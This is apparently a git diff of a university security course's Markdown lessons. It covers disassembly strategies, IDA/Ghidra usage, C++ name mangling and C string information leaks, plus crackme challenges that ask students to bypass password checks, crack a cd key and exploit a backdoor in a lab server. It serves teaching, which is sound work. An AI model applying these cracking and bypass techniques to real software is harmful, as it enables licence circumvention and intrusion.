+ + +## Challenges + +Use GDB and pwndbg to run the code provided in the Activities section. + +### 01. Challenge - Explore The Simple Password Protected Bash + +The executable gets input from the user and evaluates it against a static condition. +If it succeeds it then calls a `password_accepted` function that prints out a success message and spawns a shell. + +Your task is to use GDB and pwndbg to force the executable to call the `password_accepted` function. + +Gather as much info about the executable as possible through the techniques you have learned in previous sessions. + +Think of modifying registers for forcing the executable to call thefunction (there is more than one way of doing this). + +### 02. Challenge - Simple Password Protected Bash Destruction + +What is the condition against which your input is evaluated in the executable contained in the executable `sppb`? + +The ultimate goal is to be able to craft an input for the binary so that the `password_accepted` function is called (modifying registers while running the program in GDB is just for training purposes). + +### 03. Challenge - Domino + +Analyze the binary, reverse engineer what it does and get a nice message +back. + +### 04. Challenge - Call me + +Investigate the binary in `04-challenge-call-me/src/call_me` and find out the flag + +Hint: There is something hidden you can toy around with. + +Hint: The challenge name is a hint. + +### 05. Challenge - Snooze Me + +I wrote a simple binary that computes the answer to life, the universe and everything. +It swear it works... eventually. + +### 06. Challenge - Phone Home + +To protect their confidential data from those snooping cloud providers, the authors of `06-challenge-phone-home/src/phone_home` have used some obfuscation techniques. + +Unfortunately, the key feature of the application is now unreachable due to a bug. +Can you bypass the impossible condition? + +### 07. Challenge - Chain encoder + +How do you reverse something made to be ireversible, you are welcome to find out in this challenge. + +### 08. Challenge - Simple cdkey + +I found this software but i don't have the cd key, can you crack it for me? diff --git a/chapters/binary-analysis/static-analysis/reading/README.md b/chapters/binary-analysis/static-analysis/reading/README.md index 98c413e..c9fe0ba 100644 --- a/chapters/binary-analysis/static-analysis/reading/README.md +++ b/chapters/binary-analysis/static-analysis/reading/README.md @@ -1,377 +1,377 @@ -# Static Analysis - -## Table of Contents - -- [Introduction](#introduction) -- [Disassembling executables](#disassembling-executables) - - [Linear Sweep](#linear-sweep) - - [Recursive Traversal](#recursive-traversal) -- [IDA and Ghidra](#ida-and-ghidra) - - [IDA tips & tricks](#ida-tips--tricks) - - [IDA Pro and Ghidra](#ida-pro-and-ghidra) -- [C++](#c) -- [Further reading](#further-reading) -- [Challenges](#challenges) - - [04. crypto_crackme](#04-crypto_crackme) - - [05. broken](#05-broken) - - [06. hyp3rs3rv3r](#06-hyp3rs3rv3r) - -## Introduction - -Sometimes we are either unable or reluctant to run an unknown executable. -This inability to run the file can be caused by a multitude of factors, such as not having the correct dependencies or runtimes for it. -In addition, it is often unsafe to run binaries without analysing them first. -Today we'll learn about one method of analysis, called **static analysis**. - -Thus, static analysis allows us to understand the behaviour of the application by displaying either its assembly code or an equivalent high-level code. -In order to obtain the assembly code, via a procedure called **disassembling**, currently there are two approaches being used, which we'll describe in the following sections. -The high-level code, is _deduced_ from the machine code, through a more complex process called **decompilation**, which sometimes might make it a bit inaccurate, when compared to the assembly code. - -## Disassembling Executables - -There are two main strategies when it comes to disassembly. -They are called **Linear Sweep** and **Recursive Traversal**. -As we'll see below, the main difference between the two is their accuracy - -### Linear Sweep - -The first strategy that we'll look at is _Linear Sweep_. -A very popular tool that uses this strategy is `objdump`. -What _Linear Sweep_ does is it parses the `.text` section of the executable from the beginning to the end and translates each encountered machine code instruction into its equivalent Assembly instruction. -It's a fast and simple algorithm. -Being so simple, however, renders it vulnerable to being mislead. -This can happen in a few ways. -One way is to insert an inappropriate instruction somewhere in the `.text` section. -When the algorithm reaches it, it will try to interpret it as something meaningful and output a completely different Assembly code that would make no sense. - -Let's consider the code below, which is also available [in this repo](https://github.com/hexcellents/sss-exploit/blob/master/sessions/04-static-analysis/activities/01-tutorial-disassemble-methods/src/wrong.c): - -```c -int main() -{ - asm volatile( - "A: jmp B\n\t" - ".byte 0xde\n\t" - ".byte 0xad\n\t" - ".byte 0xc0\n\t" - ".byte 0xde\n\t" - "jmp -1\n\t" - "B:\n\t" - ); - printf("What is wrong with me :-s?\n"); - return -1; -} -``` - -Take a look at the Makefile rule for `wrong` and notice that it **strips** the binary: - -```makefile -wrong: wrong.o - $(CC) $(CFLAGS) $< -o $@ - -strip $@ -``` - -If we remove the line at the end of the snipped above and then disassemble the executable, we can see our inline assembly code (`de ad c0 de`) together with the encoding of `jmp -1`. -The binary code is as expected, but the way it's interpreted is completely off. -This happens because _objdump_ gets "confused" when reaching the bytes `de ad c0 de` and can't figure out that that code is meaningless. - -```asm -080491ab : - 80491ab: eb 09 jmp 80491b6 - 80491ad: de ad c0 de e9 49 fisubr WORD PTR [ebp+0x49e9dec0] - 80491b3: 6e outs dx,BYTE PTR ds:[esi] - 80491b4: fb sti - 80491b5: f7 .byte 0xf7 - -080491b6 : - 80491b6: 83 ec 0c sub esp,0xc -``` - -If we restore the line where the binary is stripped, recompile and disassemble it once more, we see that this time, `objdump` gets completely lost when it encounters our `de ad c0 de` sequence. -This is because, previously, it used symbols in the binary, such as `B`, to figure out where some of the real instructions started. -Now, without the help of those symbols, `objdump` doesn't manage to output a coherent Assembly code. - -```asm - 804840c: eb 09 jmp 8048417 <__libc_start_main@plt+0x127> - 804840e: de ad c0 de e9 e8 fisubr WORD PTR [ebp-0x17162140] - 8048414: 7b fb jnp 8048411 <__libc_start_main@plt+0x121> - 8048416: f7 83 ec 0c 68 c0 84 test DWORD PTR [ebx-0x3f97f314],0xe8080484 - 804841d: 04 08 e8 - 8048420: ac lods al,BYTE PTR ds:[esi] - 8048421: fe (bad) - 8048422: ff (bad) - 8048423: ff 83 c4 10 b8 ff inc DWORD PTR [ebx-0x47ef3c] - 8048429: ff (bad) - 804842a: ff (bad) - 804842b: ff 8b 4d fc c9 8d dec DWORD PTR [ebx-0x723603b3] - 8048431: 61 popa - 8048432: fc cld - 8048433: c3 ret -``` - -In order to avoid traps like the one showcased above, we need to use smarter disassembly techniques, such as _Recursive Traversal_. - -### Recursive Traversal - -Note that, in the example above, the misleading instruction is never executed. -If it were, the program would crash after receiving a `SIGILL` signal and after outputting `Illegal instruction (core dumped)`, because the CPU would not know how to decode that particular instruction. -But if we run the binary above, we notice that it doesn't crash. -So that instruction is nothing but dead code. -As a result, it's useless to us no matter what it means. -And this is where _Recursive Traversal_ comes in. - -This strategy doesn't start the disassembly at the beginning of the `.text` section, but at the entry point (the address of the `_start` symbol) and disassembles the instructions linearly, while also considering **jumps**. -Thus, when encountering code branches, the algorithm follows them and creates what's called a **Control Flow Graph (CFG)**, where each node is called a **Basic Block (BB)** and is made up of instructions that are always executed in that order, regardless of conditional jumps or function calls. -Take a look at the CFG below and note the BBs and the jumps that make up the arches. -The code comes from the `hyp3rs3rv3r` binary, which can be found [here](https://github.com/hexcellents/sss-exploit/tree/master/sessions/04-static-analysis/activities/02-tutorial-ida-time/src). -To make things harder, this executable was also stripped. -![CFG created by IDA](../media/fork_xref_2.png) - -In conclusion, we can look at the CFG as being a DFS (recursive) traversal of the code, separated into BBs, with `ret` instructions acting as _back edges_. - -## IDA and Ghidra - -The tool that we used in order to generate the image above is called [IDA](https://www.hex-rays.com/products/ida/support/download_freeware/). -Next, we'll learn how to use it! - -We'll showcase the functionalities of IDA by disassembling the `hyp3rs3rv3r` binary. -The first screen you are presented with is the following: - -![Initial IDA Screen](../media/ida_initial_screen.png) - -Main components: - -- On the left you have the **Function window** with the list of identified subroutines, functions or external functions called by the binary. -They are color coded according to the legend right above it. -- Under it you have a graph overview of the view presented on the right. -- On the right you have multiple tabs, with the **Function summary** selected in the IDA-view. -We will not be using this. -Instead, we will switch to the complete **Graph View** of functions by pressing the spacebar. -This graph is the CFG we mentioned earlier. - -Upon pressing spacebar and navigating in the **Function window** to functions that are not coloured (meaning they are part of this binary) we get the following view: -![IDA - First View](../media/ida_first_view.png) - -When reversing binaries, we will see this particular Assembly construct a lot, as it is the standard one generated by `gcc`. -Remember from [the "Executables an Processes" session](../../executables-and-processes/reading) that [`__libc_start_main`](refspecs.linuxbase.org/LSB_3.1.1/LSB-Core-generic/LSB-Core-generic/baselib---libc-start-main-.html) is the wrapper that calls `main`. -We now rename the last argument pushed on the stack to main. -Press `n` and enter the new name. -Now you have your first function identified. -Click on it to see what `main` does: - -![main](../media/ida_main.png) - -Note how the execution is neatly layed out in the CFG view. -If you look at the left panel you can see the complete view. -The execution is divided because of conditional and unconditional branches. -Let's figure out what happens by analyzing the assembly code: - -First we have the function prologue, stack alignment and stack allocation: - -```asm -push ebp -mov ebp, esp -and esp, 0FFFFFFF0h -sub esp, 450h -``` - -Next, a variable on the stack is initialized to 1. -If you click on `434h` it will become highlighted and you can scroll through the whole function to see where it's used later. -We'll ignore this for now. - -```asm -mov dword ptr [esp+434h], 1 -``` - -Next, we see the first branching: - -``` -cmp [ebp+arg_0], 2 -jz short loc_8049068 -``` - -**Remember!** On 32 bit systems, `[ebp + 0]` is the saved `ebp`, `[ebp + 4]` is the return address and `[ebp + 8]` is the first argument to the current function. -IDA follows a slightly different naming convention: `[ebp + 8]` is named `[ebp+arg_0]`. `[ebp + 12]` is named `[ebp+arg_4]` etc. -You can rename those `arg_*` constructs if you want, anyway. - -So it's referring to the first argument: `argc`. -Basically, what it does is: - -```c -if(argc == 2) { - goto loc_8049068 -} else { -.... -} -``` - -What does the `else` branch do? - -```asm -mov eax, [ebp+arg_4] -mov eax, [eax] -mov [esp+4], eax -mov dword ptr [esp], offset format ; "Usage: %s \n" -call _printf - -mov dword ptr [esp], 0 ; status -call _exit -``` - -It's pretty straightforward if you remember the tasks from [Session 02](https://github.com/hexcellents/sss-exploit/tree/master/sessions/03-executable-file-formats). -The second argument (`argv`) is dereferenced and pushed on the stack along with a format string. -Then `printf` is called. -Next, `exit` is called with a status of 0. - -```c -if(argc == 2) { - goto loc_8049068 -} else { - printf("%s \n", argv[0]); - exit(0); -} -``` - -Now let's do something a bit more advanced: we want to identify the 2 commands that the server accepts by using static analysis. -How do we approach this problem as fast as possible? We already know that the server accepts multiple clients. -It can do this through forking. -Let's see where `fork` is called in the program. -First find the `fork` function on the left panel and select it. -Now you see a stub to it from the `PLT` section. -We want to find all locations in the program that call this function. -You can achieve this by obtaining all the **cross-references (xrefs)** to it by pressing `x`. -You should get the following screen: - -![fork cross-references 1](../media/fork_xref_1.png) - -Click that location and you will get to the forking point: - -![fork cross-references 2](../media/fork_xref_2.png) - -You can see that the return value is stored on the stack at `[esp+438h]`, some error checking (`perror` and `exit`) is done and then the return value is checked for 0 (as we traditionally do for `fork` calls). -The child will execute `sub_8048ED7` and the parent will loop back. -You can rename `sub_8048ED7` to something more legible such as `handle_child_process` -In this function you can now clearly see the two commands and which function is called for each: - -![handle_child_process](../media/handle_child_process.png) - -It looks like the one on the left, `sub_8048B0B` handles the `LIST` command so we rename it to `handle_LIST`. -As expected, it calls `opendir` and `readdir` to read all the files in the current directory, then writes them to the socket. - -![handle_LIST](../media/handle_LIST.png) - -### IDA tips & tricks - -- Saving progress is disabled for the trial version. - However, you can save a limited (but useful) subset of your work using `File -> Produce File -> Dump database to IDC file` and then load it next time using `File -> Script File`. -- If you close some windows and don't know how to get them back you can reset the layout using `Windows->Reset Desktop`. -- If you want to return to the previous view you can press `Escape`. -- When you want to view code as in `objdump` you only need to press `Spacebar` once. - And then again to return to CFG mode. -- If there is a hex value and you want to convert it to decimal (or back) press `h`. -- Converting hex/dec values to _ASCII_: press `r`. -- If you want to write comments next to an instruction or a function press `:`. - -### IDA Pro and Ghidra - -IDA Pro is installed on the Kali virtual machine. -The main difference between it and the free version is that the Pro one can also **decompile** the code based on the CFGs listed above. -This will come in extremely useful as we hack more and more binaries. - -Another tool that is capable of decompiling the code in an executable is [Ghidra](https://ghidra-sre.org/). -One advantage of Ghidra over IDA is that Ghidra displays both the C and the Assembly code side by side. -This allows us to correlate the two and reap the benefits of both of them at the same time. - -## C++ - -Things look slightly different when we try to hack executables that have been compiled from C++ code, instead of C. -The difference comes from the way symbols (method symbols in particular) are handled by C++ compilers. -Let's disassemble the code below and see how its symbols look: - -```code c -##include -using namespace std; -int main() -{ - cout << "Hello world" << endl; - return 0; -} -``` - -Disassembling it in IDA looks familiar at first - -![IDA start](../media/ida_c%2B%2B_start.png) - -But then the fun starts: - -![IDA main](../media/ida_c%2B%2B_main.png) - -As we can see, all symbols look almost as if they were encrypted. -In fact, this process is called **name mangling**. -If we take a closer look at them, however, we can distinguish some clues about those function calls, for example. -The first one contains the sequences `char_traits` and `basic_ostream`, the former being a C++ abstraction for string operations, while the latter is a base class for output operators, such as `<<`. - -IDA can demangle strings such as the ones above by itself. -Some recommended settings (you may prefer something different) are the following: - -- `Options -> Demangled names` -- Show demangled C++ names as `Names` -- `Setup short names` -- Click `Only main name` - -These settings only display the important classes and namespaces that make up each method, like this: - -![IDA demangled](../media/ida_c%2B%2B_demangled.png) - -## Further reading - -More information about name mangling can be obtained at: - -- https://en.wikipedia.org/wiki/Name_mangling -- on demand demangling: http://demangler.com/ or c++filt - -You can find out more information about the internals of C++ in general, using the following references: - -- https://ocw.cs.pub.ro/courses/cpl/labs/06 (in Romanian) -- https://www.blackhat.com/presentations/bh-dc-07/Sabanal_Yason/Paper/bh-dc-07-Sabanal_Yason-WP.pdf -- http://www.hexblog.com/wp-content/uploads/2011/08/Recon-2011-Skochinsky.pdf - -## Challenges - -### 04. crypto_crackme - -The `crypto_crackme` binary is an application that asks for a secret and uses it to decrypt a message. -In order to solve this task, you have to retrieve the message. - -- Open the binary using IDA and determine the program control flow. - What is it doing after fetching the secret? It seems to be consuming a lot of CPU cycles. - If possible, use IDA to patch the program and reduce the execution time of the application. - Use `Edit -> Patch program -> Change byte...` -- Next, it looks like the program tries to verify if the secret provided is correct. - Where is the secret stored? Is it stored in plain text? Find out what the validation algorithm is. -- Now break it and retrieve the message! - -**Important!**: Unfortunately, the virtual machine doesn't support the libssl1.0.0 version of SSL library. -Use the library files in the task archive and run the executable using: - -```console -LD_LIBRARY_PATH=. ./crypto_crackme -``` - -You can break password hashes (including SHA1) on [CrackStation](https://crackstation.net/). - -### 05. broken - -The `broken` binary is asking you for the correct password. -Investigate the binary and provide it with the correct password. -If you provided the correct password the message `That's correct! The password is '...'`. - -### 06. hyp3rs3rv3r - -Investigate the `hyp3rs3rv3r` binary and find out where the backdoor function is. -Note that since it's not directly called, IDA doesn't think of it as a procedure, so it won't come up on the left pane. -Figure out a way around this. -When you find that code block you can press `p` on the first instruction to help IDA see it as a procedure. - -**Hint**: In order to exploit the vulnerability in Ubuntu, you should use netcat-traditional. -You can switch from netcat-openbsd to netcat-traditional using the steps described [here](https://stackoverflow.com/questions/10065993/how-to-switch-to-netcat-traditional-in-ubuntu). +# Static Analysis + +## Table of Contents + +- [Introduction](#introduction) +- [Disassembling executables](#disassembling-executables) + - [Linear Sweep](#linear-sweep) + - [Recursive Traversal](#recursive-traversal) +- [IDA and Ghidra](#ida-and-ghidra) + - [IDA tips & tricks](#ida-tips--tricks) + - [IDA Pro and Ghidra](#ida-pro-and-ghidra) +- [C++](#c) +- [Further reading](#further-reading) +- [Challenges](#challenges) + - [04. crypto_crackme](#04-crypto_crackme) + - [05. broken](#05-broken) + - [06. hyp3rs3rv3r](#06-hyp3rs3rv3r) + +## Introduction + +Sometimes we are either unable or reluctant to run an unknown executable. +This inability to run the file can be caused by a multitude of factors, such as not having the correct dependencies or runtimes for it. +In addition, it is often unsafe to run binaries without analysing them first. +Today we'll learn about one method of analysis, called **static analysis**. + +Thus, static analysis allows us to understand the behaviour of the application by displaying either its assembly code or an equivalent high-level code. +In order to obtain the assembly code, via a procedure called **disassembling**, currently there are two approaches being used, which we'll describe in the following sections. +The high-level code, is _deduced_ from the machine code, through a more complex process called **decompilation**, which sometimes might make it a bit inaccurate, when compared to the assembly code. + +## Disassembling Executables + +There are two main strategies when it comes to disassembly. +They are called **Linear Sweep** and **Recursive Traversal**. +As we'll see below, the main difference between the two is their accuracy + +### Linear Sweep + +The first strategy that we'll look at is _Linear Sweep_. +A very popular tool that uses this strategy is `objdump`. +What _Linear Sweep_ does is it parses the `.text` section of the executable from the beginning to the end and translates each encountered machine code instruction into its equivalent Assembly instruction. +It's a fast and simple algorithm. +Being so simple, however, renders it vulnerable to being mislead. +This can happen in a few ways. +One way is to insert an inappropriate instruction somewhere in the `.text` section. +When the algorithm reaches it, it will try to interpret it as something meaningful and output a completely different Assembly code that would make no sense. + +Let's consider the code below, which is also available [in this repo](https://github.com/hexcellents/sss-exploit/blob/master/sessions/04-static-analysis/activities/01-tutorial-disassemble-methods/src/wrong.c): + +```c +int main() +{ + asm volatile( + "A: jmp B\n\t" + ".byte 0xde\n\t" + ".byte 0xad\n\t" + ".byte 0xc0\n\t" + ".byte 0xde\n\t" + "jmp -1\n\t" + "B:\n\t" + ); + printf("What is wrong with me :-s?\n"); + return -1; +} +``` + +Take a look at the Makefile rule for `wrong` and notice that it **strips** the binary: + +```makefile +wrong: wrong.o + $(CC) $(CFLAGS) $< -o $@ + -strip $@ +``` + +If we remove the line at the end of the snipped above and then disassemble the executable, we can see our inline assembly code (`de ad c0 de`) together with the encoding of `jmp -1`. +The binary code is as expected, but the way it's interpreted is completely off. +This happens because _objdump_ gets "confused" when reaching the bytes `de ad c0 de` and can't figure out that that code is meaningless. + +```asm +080491ab : + 80491ab: eb 09 jmp 80491b6 + 80491ad: de ad c0 de e9 49 fisubr WORD PTR [ebp+0x49e9dec0] + 80491b3: 6e outs dx,BYTE PTR ds:[esi] + 80491b4: fb sti + 80491b5: f7 .byte 0xf7 + +080491b6 : + 80491b6: 83 ec 0c sub esp,0xc +``` + +If we restore the line where the binary is stripped, recompile and disassemble it once more, we see that this time, `objdump` gets completely lost when it encounters our `de ad c0 de` sequence. +This is because, previously, it used symbols in the binary, such as `B`, to figure out where some of the real instructions started. +Now, without the help of those symbols, `objdump` doesn't manage to output a coherent Assembly code. + +```asm + 804840c: eb 09 jmp 8048417 <__libc_start_main@plt+0x127> + 804840e: de ad c0 de e9 e8 fisubr WORD PTR [ebp-0x17162140] + 8048414: 7b fb jnp 8048411 <__libc_start_main@plt+0x121> + 8048416: f7 83 ec 0c 68 c0 84 test DWORD PTR [ebx-0x3f97f314],0xe8080484 + 804841d: 04 08 e8 + 8048420: ac lods al,BYTE PTR ds:[esi] + 8048421: fe (bad) + 8048422: ff (bad) + 8048423: ff 83 c4 10 b8 ff inc DWORD PTR [ebx-0x47ef3c] + 8048429: ff (bad) + 804842a: ff (bad) + 804842b: ff 8b 4d fc c9 8d dec DWORD PTR [ebx-0x723603b3] + 8048431: 61 popa + 8048432: fc cld + 8048433: c3 ret +``` + +In order to avoid traps like the one showcased above, we need to use smarter disassembly techniques, such as _Recursive Traversal_. + +### Recursive Traversal + +Note that, in the example above, the misleading instruction is never executed. +If it were, the program would crash after receiving a `SIGILL` signal and after outputting `Illegal instruction (core dumped)`, because the CPU would not know how to decode that particular instruction. +But if we run the binary above, we notice that it doesn't crash. +So that instruction is nothing but dead code. +As a result, it's useless to us no matter what it means. +And this is where _Recursive Traversal_ comes in. + +This strategy doesn't start the disassembly at the beginning of the `.text` section, but at the entry point (the address of the `_start` symbol) and disassembles the instructions linearly, while also considering **jumps**. +Thus, when encountering code branches, the algorithm follows them and creates what's called a **Control Flow Graph (CFG)**, where each node is called a **Basic Block (BB)** and is made up of instructions that are always executed in that order, regardless of conditional jumps or function calls. +Take a look at the CFG below and note the BBs and the jumps that make up the arches. +The code comes from the `hyp3rs3rv3r` binary, which can be found [here](https://github.com/hexcellents/sss-exploit/tree/master/sessions/04-static-analysis/activities/02-tutorial-ida-time/src). +To make things harder, this executable was also stripped. +![CFG created by IDA](../media/fork_xref_2.png) + +In conclusion, we can look at the CFG as being a DFS (recursive) traversal of the code, separated into BBs, with `ret` instructions acting as _back edges_. + +## IDA and Ghidra + +The tool that we used in order to generate the image above is called [IDA](https://www.hex-rays.com/products/ida/support/download_freeware/). +Next, we'll learn how to use it! + +We'll showcase the functionalities of IDA by disassembling the `hyp3rs3rv3r` binary. +The first screen you are presented with is the following: + +![Initial IDA Screen](../media/ida_initial_screen.png) + +Main components: + +- On the left you have the **Function window** with the list of identified subroutines, functions or external functions called by the binary. +They are color coded according to the legend right above it. +- Under it you have a graph overview of the view presented on the right. +- On the right you have multiple tabs, with the **Function summary** selected in the IDA-view. +We will not be using this. +Instead, we will switch to the complete **Graph View** of functions by pressing the spacebar. +This graph is the CFG we mentioned earlier. + +Upon pressing spacebar and navigating in the **Function window** to functions that are not coloured (meaning they are part of this binary) we get the following view: +![IDA - First View](../media/ida_first_view.png) + +When reversing binaries, we will see this particular Assembly construct a lot, as it is the standard one generated by `gcc`. +Remember from [the "Executables an Processes" session](../../executables-and-processes/reading) that [`__libc_start_main`](refspecs.linuxbase.org/LSB_3.1.1/LSB-Core-generic/LSB-Core-generic/baselib---libc-start-main-.html) is the wrapper that calls `main`. +We now rename the last argument pushed on the stack to main. +Press `n` and enter the new name. +Now you have your first function identified. +Click on it to see what `main` does: + +![main](../media/ida_main.png) + +Note how the execution is neatly layed out in the CFG view. +If you look at the left panel you can see the complete view. +The execution is divided because of conditional and unconditional branches. +Let's figure out what happens by analyzing the assembly code: + +First we have the function prologue, stack alignment and stack allocation: + +```asm +push ebp +mov ebp, esp +and esp, 0FFFFFFF0h +sub esp, 450h +``` + +Next, a variable on the stack is initialized to 1. +If you click on `434h` it will become highlighted and you can scroll through the whole function to see where it's used later. +We'll ignore this for now. + +```asm +mov dword ptr [esp+434h], 1 +``` + +Next, we see the first branching: + +``` +cmp [ebp+arg_0], 2 +jz short loc_8049068 +``` + +**Remember!** On 32 bit systems, `[ebp + 0]` is the saved `ebp`, `[ebp + 4]` is the return address and `[ebp + 8]` is the first argument to the current function. +IDA follows a slightly different naming convention: `[ebp + 8]` is named `[ebp+arg_0]`. `[ebp + 12]` is named `[ebp+arg_4]` etc. +You can rename those `arg_*` constructs if you want, anyway. + +So it's referring to the first argument: `argc`. +Basically, what it does is: + +```c +if(argc == 2) { + goto loc_8049068 +} else { +.... +} +``` + +What does the `else` branch do? + +```asm +mov eax, [ebp+arg_4] +mov eax, [eax] +mov [esp+4], eax +mov dword ptr [esp], offset format ; "Usage: %s \n" +call _printf + +mov dword ptr [esp], 0 ; status +call _exit +``` + +It's pretty straightforward if you remember the tasks from [Session 02](https://github.com/hexcellents/sss-exploit/tree/master/sessions/03-executable-file-formats). +The second argument (`argv`) is dereferenced and pushed on the stack along with a format string. +Then `printf` is called. +Next, `exit` is called with a status of 0. + +```c +if(argc == 2) { + goto loc_8049068 +} else { + printf("%s \n", argv[0]); + exit(0); +} +``` + +Now let's do something a bit more advanced: we want to identify the 2 commands that the server accepts by using static analysis. +How do we approach this problem as fast as possible? We already know that the server accepts multiple clients. +It can do this through forking. +Let's see where `fork` is called in the program. +First find the `fork` function on the left panel and select it. +Now you see a stub to it from the `PLT` section. +We want to find all locations in the program that call this function. +You can achieve this by obtaining all the **cross-references (xrefs)** to it by pressing `x`. +You should get the following screen: + +![fork cross-references 1](../media/fork_xref_1.png) + +Click that location and you will get to the forking point: + +![fork cross-references 2](../media/fork_xref_2.png) + +You can see that the return value is stored on the stack at `[esp+438h]`, some error checking (`perror` and `exit`) is done and then the return value is checked for 0 (as we traditionally do for `fork` calls). +The child will execute `sub_8048ED7` and the parent will loop back. +You can rename `sub_8048ED7` to something more legible such as `handle_child_process` +In this function you can now clearly see the two commands and which function is called for each: + +![handle_child_process](../media/handle_child_process.png) + +It looks like the one on the left, `sub_8048B0B` handles the `LIST` command so we rename it to `handle_LIST`. +As expected, it calls `opendir` and `readdir` to read all the files in the current directory, then writes them to the socket. + +![handle_LIST](../media/handle_LIST.png) + +### IDA tips & tricks + +- Saving progress is disabled for the trial version. + However, you can save a limited (but useful) subset of your work using `File -> Produce File -> Dump database to IDC file` and then load it next time using `File -> Script File`. +- If you close some windows and don't know how to get them back you can reset the layout using `Windows->Reset Desktop`. +- If you want to return to the previous view you can press `Escape`. +- When you want to view code as in `objdump` you only need to press `Spacebar` once. + And then again to return to CFG mode. +- If there is a hex value and you want to convert it to decimal (or back) press `h`. +- Converting hex/dec values to _ASCII_: press `r`. +- If you want to write comments next to an instruction or a function press `:`. + +### IDA Pro and Ghidra + +IDA Pro is installed on the Kali virtual machine. +The main difference between it and the free version is that the Pro one can also **decompile** the code based on the CFGs listed above. +This will come in extremely useful as we hack more and more binaries. + +Another tool that is capable of decompiling the code in an executable is [Ghidra](https://ghidra-sre.org/). +One advantage of Ghidra over IDA is that Ghidra displays both the C and the Assembly code side by side. +This allows us to correlate the two and reap the benefits of both of them at the same time. + +## C++ + +Things look slightly different when we try to hack executables that have been compiled from C++ code, instead of C. +The difference comes from the way symbols (method symbols in particular) are handled by C++ compilers. +Let's disassemble the code below and see how its symbols look: + +```code c +##include +using namespace std; +int main() +{ + cout << "Hello world" << endl; + return 0; +} +``` + +Disassembling it in IDA looks familiar at first + +![IDA start](../media/ida_c%2B%2B_start.png) + +But then the fun starts: + +![IDA main](../media/ida_c%2B%2B_main.png) + +As we can see, all symbols look almost as if they were encrypted. +In fact, this process is called **name mangling**. +If we take a closer look at them, however, we can distinguish some clues about those function calls, for example. +The first one contains the sequences `char_traits` and `basic_ostream`, the former being a C++ abstraction for string operations, while the latter is a base class for output operators, such as `<<`. + +IDA can demangle strings such as the ones above by itself. +Some recommended settings (you may prefer something different) are the following: + +- `Options -> Demangled names` +- Show demangled C++ names as `Names` +- `Setup short names` +- Click `Only main name` + +These settings only display the important classes and namespaces that make up each method, like this: + +![IDA demangled](../media/ida_c%2B%2B_demangled.png) + +## Further reading + +More information about name mangling can be obtained at: + +- https://en.wikipedia.org/wiki/Name_mangling +- on demand demangling: http://demangler.com/ or c++filt + +You can find out more information about the internals of C++ in general, using the following references: + +- https://ocw.cs.pub.ro/courses/cpl/labs/06 (in Romanian) +- https://www.blackhat.com/presentations/bh-dc-07/Sabanal_Yason/Paper/bh-dc-07-Sabanal_Yason-WP.pdf +- http://www.hexblog.com/wp-content/uploads/2011/08/Recon-2011-Skochinsky.pdf + +## Challenges + +### 04. crypto_crackme + +The `crypto_crackme` binary is an application that asks for a secret and uses it to decrypt a message. +In order to solve this task, you have to retrieve the message. + +- Open the binary using IDA and determine the program control flow. + What is it doing after fetching the secret? It seems to be consuming a lot of CPU cycles. + If possible, use IDA to patch the program and reduce the execution time of the application. + Use `Edit -> Patch program -> Change byte...` +- Next, it looks like the program tries to verify if the secret provided is correct. + Where is the secret stored? Is it stored in plain text? Find out what the validation algorithm is. +- Now break it and retrieve the message! + +**Important!**: Unfortunately, the virtual machine doesn't support the libssl1.0.0 version of SSL library. +Use the library files in the task archive and run the executable using: + +```console +LD_LIBRARY_PATH=. ./crypto_crackme +``` + +You can break password hashes (including SHA1) on [CrackStation](https://crackstation.net/). + +### 05. broken + +The `broken` binary is asking you for the correct password. +Investigate the binary and provide it with the correct password. +If you provided the correct password the message `That's correct! The password is '...'`. + +### 06. hyp3rs3rv3r + +Investigate the `hyp3rs3rv3r` binary and find out where the backdoor function is. +Note that since it's not directly called, IDA doesn't think of it as a procedure, so it won't come up on the left pane. +Figure out a way around this. +When you find that code block you can press `p` on the first instruction to help IDA see it as a procedure. + +**Hint**: In order to exploit the vulnerability in Ubuntu, you should use netcat-traditional. +You can switch from netcat-openbsd to netcat-traditional using the steps described [here](https://stackoverflow.com/questions/10065993/how-to-switch-to-netcat-traditional-in-ubuntu). diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/reading/README.md b/chapters/mitigations-and-defensive-strategies/information-leaks/reading/README.md index 0f090fe..126f0cb 100644 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/reading/README.md +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/reading/README.md @@ -1,673 +1,673 @@ -# Information Leaks - -## Introduction - -#### Objectives & Rationale - -This is a tutorial based lab. -Throughout this lab you will learn about frequent errors that occur when handling strings. -This tutorial is focused on the C language. -Generally, OOP languages (like Java, C#,C++) are using classes to represent strings -- this simplifies the way strings are handled and decreases the frequency of programming errors. - -#### What is a String? - -Conceptually, a string is sequence of characters. -The representation of a string can be done in multiple ways. -One of the way is to represent a string as a contiguous memory buffer. -Each character is **encoded** in a way. -For example the **ASCII** encoding uses 7-bit integers to encode each character -- because it is more convenient to store 8-bits at a time in a byte, an ASCII character is stored in one byte. - -The type for representing an ASCII character in C is `char` and it uses one byte. -As a side note, `sizeof(char) == 1` is the only guarantee that the [C standard](http://www.open-std.org/jtc1/sc22/WG14/www/docs/n1256.pdf "http://www.open-std.org/jtc1/sc22/WG14/www/docs/n1256.pdf") gives. - -Another encoding that can be used is Unicode (with UTF8, UTF16, UTF32 etc. as mappings). -The idea is that in order to represent an Unicode string, **more than one** byte is needed for **one** character. -`char16_t`, `char32_t` were introduced in the C standard to represent these strings. -The C language also has another type, called `wchar_t`, which is implementation defined and should not be used to represent Unicode characters. - -Our tutorial will focus on ASCII strings, where each character is represented in one byte. -We will show a few examples of what happens when one calls *string manipulation functions* that are assuming a specific encoding of the string. - -You will find extensive information on ASCII in the [ascii man page](http://man7.org/linux/man-pages/man7/ascii.7.html "http://man7.org/linux/man-pages/man7/ascii.7.html"). - -Inside an Unix terminal issue the command - -```console -man ascii -``` - -### Length Management - -In C, the length of an ASCII string is given by its contents. -An ASCII string ends with a `0` value byte called the `NUL` byte. -Every `str*` function (i.e. a function with the name starting with `str`, such as `strcpy`, `strcat`, `strdup`, `strstr` etc.) uses this `0` byte to detect where the string ends. -As a result, not ending strings in `0` and using `str*` functions leads to vulnerabilities. - -### 1. Basic Info Leak (tutorial) - - -Enter the `01-basic-info-leak/` subfolder. -It's a basic information leak example. - -In `basic_info_leak.c`, `buf` is supplied as input, hence is not trusted. -We should be careful with this buffer. -If the user gives `32` bytes as input then `strcpy` will copy bytes in `my_string` until it finds a `NUL` byte (`0x00`). -Because the [stack grows down](/courses/cns/labs/lab-05 